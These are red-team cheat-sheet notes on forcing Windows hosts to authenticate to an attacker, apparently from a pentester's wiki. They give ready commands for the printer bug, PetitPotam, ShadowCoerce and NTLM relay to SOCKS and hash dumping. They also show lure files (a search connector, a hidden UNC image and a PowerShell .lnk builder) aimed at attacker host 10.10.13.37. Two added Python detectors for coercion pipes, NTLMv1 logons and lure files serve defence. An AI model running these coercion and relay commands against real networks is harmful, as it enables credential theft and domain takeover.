Authentication Coercion
It's a good idea to check if NTLMv1 downgrade is possible when triggering the callbacks.

Printer Bug (MS-RPRN)

https://twitter.com/DebugPrivilege/status/1410158556540719104
Check if Spooler is running via Remote Registry:
$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR

SpoolSample

Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 [email protected]/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 [email protected]/test.txt

dementor.py

$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' [email protected]/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' [email protected]/test.txt DC01.megacorp.local

printerbug.py

$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local [email protected]/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local [email protected]/test.txt

PetitPotam (MS-EFSR)

CVE-2021-36942
$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' [email protected]/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' [email protected]/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe [email protected]/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe [email protected]/test.txt 192.168.1.11 1
PetitPotam any host (not only a DC with null sessions allowed for the IPC$ share) without initial creds by proxying through an authenticated session on behalf of a DC-relayed machine account:
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.123
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
$ sudo ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.123 -smb2support --no-http-server --no-wcf-server -socks
$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers
$ sudo ./Responder.py -I eth0 -vA
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.123
NTLM Relay DC1 to EXCH1 to get SOCKS ➡️ SOCKS proxy PetitPotam to EXCH1 as DC1$ ➡️ NTLM Relay to EXCH2 to dump hashes
With Kerberos authentication:
$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local

Theory

Mitigation

ShadowCoerce (MS-FSRVP)

$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11
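On the coerced host, every method in the sections above (printer bug, PetitPotam, ShadowCoerce) shows up as an IPC$ named-pipe access, and the NTLMv1 downgrade mentioned at the top of the page shows up in the logon record. The Python below is an added example, not code from the original notes or from any of the tools listed; it audits Security-event records for both. The input records are constructed dictionaries using the field names of events 5145 (network share object checked) and 4624 (logon), not captured logs, and the pipe-to-protocol mapping (spoolss, efsrpc/lsarpc, FssagentRpc) is an assumed list covering MS-RPRN, MS-EFSR and MS-FSRVP.

```python
"""Flag authentication coercion and NTLMv1 use in Windows Security event data.

Added example, not part of the original notes. Input records are constructed
dictionaries carrying the field names of Security events 5145 (network share
object checked) and 4624 (logon); they are not captured logs.
"""

# Named pipes under IPC$ that the coercion methods in these notes talk to.
# Lookup is case-insensitive, so keys are stored lowercase (assumed mapping).
COERCION_PIPES = {
    "spoolss": "MS-RPRN (printer bug)",
    "efsrpc": "MS-EFSR (PetitPotam)",
    "lsarpc": "MS-EFSR (PetitPotam over lsarpc)",
    "fssagentrpc": "MS-FSRVP (ShadowCoerce)",
}

# LmPackageName values of 4624 that mean a downgraded response was accepted.
WEAK_LM_PACKAGES = {"NTLM V1", "LM"}


def coercion_pipe(event):
    """Protocol label if a 5145 event opens a coercion pipe on IPC$, else None."""
    if event.get("EventID") != 5145:
        return None
    if not event.get("ShareName", "").upper().endswith("\\IPC$"):
        return None
    target = event.get("RelativeTargetName", "").strip("\\").lower()
    return COERCION_PIPES.get(target)


def is_ntlmv1_logon(event):
    """True for a 4624 network logon (type 3) that used NTLM V1 or LM."""
    return (event.get("EventID") == 4624
            and event.get("LogonType") == 3
            and event.get("LmPackageName", "").upper() in WEAK_LM_PACKAGES)


def audit(events):
    """Return (severity, ip, account, detail) findings, most severe first."""
    findings = []
    for ev in events:
        ip = ev.get("IpAddress", "?")
        proto = coercion_pipe(ev)
        if proto:
            subject = ev.get("SubjectUserName", "?")
            # Unauthenticated access to the pipe is the null-session case.
            sev = "high" if subject.upper() == "ANONYMOUS LOGON" else "medium"
            findings.append((sev, ip, subject,
                             f"coercion pipe {ev['RelativeTargetName']} -> {proto}"))
        elif is_ntlmv1_logon(ev):
            findings.append(("high", ip, ev.get("TargetUserName", "?"),
                             f"network logon with {ev['LmPackageName']}"))
    order = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: order[f[0]])


def by_source(findings):
    """Count findings per source address; one noisy address is the usual picture."""
    counts = {}
    for _, ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


# Constructed sample records (not real logs).
SAMPLE_EVENTS = [
    {"EventID": 5145, "SubjectUserName": "ANONYMOUS LOGON", "IpAddress": "10.10.13.37",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "efsrpc"},
    {"EventID": 5145, "SubjectUserName": "snovvcrash", "IpAddress": "10.10.13.37",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "spoolss"},
    {"EventID": 5145, "SubjectUserName": "jdoe", "IpAddress": "192.168.1.50",
     "ShareName": "\\\\*\\Documents", "RelativeTargetName": "report.docx"},
    {"EventID": 4624, "TargetUserName": "DC1$", "IpAddress": "10.10.13.37",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V1"},
    {"EventID": 4624, "TargetUserName": "jdoe", "IpAddress": "192.168.1.50",
     "LogonType": 3, "AuthenticationPackageName": "NTLM", "LmPackageName": "NTLM V2"},
    {"EventID": 5145, "SubjectUserName": "jdoe", "IpAddress": "192.168.1.50",
     "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc"},   # benign pipe
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_EVENTS):
        print(finding)
    print(by_source(audit(SAMPLE_EVENTS)))
```

Run against the constructed sample it reports three findings, all from 10.10.13.37: the anonymous efsrpc access (high), the NTLMv1 machine-account logon (high) and the authenticated spoolss access (medium); the ordinary share access, the NTLMv2 logon and the srvsvc pipe produce nothing.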

WebDAV (WebClient)

Check if callback via WebDAV (HTTP) is possible. It is when the WebClient service is running. If it's possible, then NTLM Relay to LDAPS on behalf of the relayed machine account is your chance for RBCD workstation takeover.
Check via PowerShell:
PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'
Check via CME:
$ cme smb hosts.txt -u snovvcrash -p 'Passw0rd!' -M webdav
Check via GetWebDAVStatus:
PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

Enable WebClient

Put the .searchConnector-ms file on a writable share. When a domain user opens the target folder in Explorer, the WebClient service should start automatically:
Documents.searchConnector-ms
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://whatever/</url>
</simpleLocation>
</searchConnectorDescription>

Force SMB authentication

Forcing with a hidden image:
<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />
Forcing with a shortcut:
lnk.ps1
$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()
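The lure files in the last two sections (the .searchConnector-ms with an off-site url, the hidden <img> with a UNC source, the .lnk whose IconLocation points at a remote host) are what a share owner would want to find before a user does. The Python below is an added example, not code from the original notes; it scans a set of files and reports any that reference a host outside an allow-list. The allow-list, file names and file contents are constructed samples, and the .lnk check is a string heuristic over UTF-16LE and 8-bit strings in the file bytes, not a full Shell Link parser.

```python
"""Find share-hosted lure files that make Windows clients authenticate elsewhere.

Added example, not part of the original notes. Covers the three lure types
shown above: a .searchConnector-ms whose url points off-site, an HTML file
with a UNC src attribute, and a .lnk carrying a remote IconLocation. The .lnk
check is a string heuristic over the file bytes, not a Shell Link parser.
All sample files and the allow-list are constructed.
"""
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# \\host\rest ; control characters excluded so NUL-terminated strings pulled
# out of binary files end where the string ends.
UNC_RE = re.compile(r'\\\\([^\\\s"\'<>\x00-\x1f]+)\\([^\s"\'<>\x00-\x1f]+)')
SRC_RE = re.compile(r'src\s*=\s*["\']([^"\']+)["\']', re.I)
SC_NS = "{http://schemas.microsoft.com/windows/2009/searchConnector}"


def search_connector_host(data: bytes):
    """Host named in simpleLocation/url of a .searchConnector-ms, or None."""
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return None
    url_el = root.find(f".//{SC_NS}url")
    if url_el is None:
        url_el = root.find(".//url")  # file written without the default namespace
    if url_el is None or not url_el.text:
        return None
    return urlparse(url_el.text.strip()).hostname


def unc_hosts(text: str):
    """Hosts referenced by UNC paths in a string."""
    return {host for host, _ in UNC_RE.findall(text)}


def unc_hosts_in_binary(data: bytes):
    """UNC hosts stored as UTF-16LE (either byte alignment) or 8-bit strings."""
    hosts = set()
    for off in (0, 1):
        chunk = data[off:]
        chunk = chunk[: len(chunk) // 2 * 2]
        hosts |= unc_hosts(chunk.decode("utf-16-le", errors="ignore"))
    hosts |= unc_hosts(data.decode("latin-1"))
    return hosts


def scan_file(name: str, data: bytes, allowed_hosts):
    """(name, kind, host) for every referenced host not in allowed_hosts."""
    lower = name.lower()
    refs = []
    if lower.endswith(".searchconnector-ms"):
        host = search_connector_host(data)
        if host:
            refs.append(("searchConnector url", host))
    elif lower.endswith((".html", ".htm")):
        for src in SRC_RE.findall(data.decode("utf-8", errors="ignore")):
            refs += [("src= UNC path", h) for h in unc_hosts(src)]
    elif lower.endswith(".lnk"):
        refs += [("lnk UNC string", h) for h in unc_hosts_in_binary(data)]
    allowed = {h.lower() for h in allowed_hosts}
    return [(name, kind, host) for kind, host in refs if host.lower() not in allowed]


def scan_files(files, allowed_hosts):
    """Run scan_file over a {name: bytes} mapping (e.g. a share listing)."""
    findings = []
    for name, data in files.items():
        findings.extend(scan_file(name, data, allowed_hosts))
    return findings


ALLOWED_HOSTS = {"srv01", "fileserver.megacorp.local"}  # constructed allow-list

# Constructed sample files, not real share content.
SAMPLE_FILES = {
    # The connector from the section above, url on an unknown host.
    "Documents.searchConnector-ms": b"""<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<simpleLocation><url>https://whatever/</url></simpleLocation>
</searchConnectorDescription>""",
    # Same format pointing at an allowed internal host: no finding.
    "Shared.searchConnector-ms": b"""<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<simpleLocation><url>https://fileserver.megacorp.local/docs/</url></simpleLocation>
</searchConnectorDescription>""",
    # The hidden-image lure.
    "index.html": b'<html><body><img src="\\\\10.10.13.37\\pwn.ico" height="1" width="1" /></body></html>',
    # Shell Link magic prefix followed by an IconLocation-style UTF-16LE string.
    # Not a valid .lnk; enough for the string heuristic.
    "pwn.lnk": (b"L\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
                + "\\\\10.10.13.37\\pwn.ico".encode("utf-16-le") + b"\x00\x00"),
    "readme.txt": b"nothing to see here",
}

if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES, ALLOWED_HOSTS):
        print(finding)
```

On the constructed set it reports three files (the off-site connector, the HTML file and the .lnk, the last two both pointing at 10.10.13.37) and stays quiet on the connector that points at an allowed internal host. A real run would feed scan_files from a directory walk of the share.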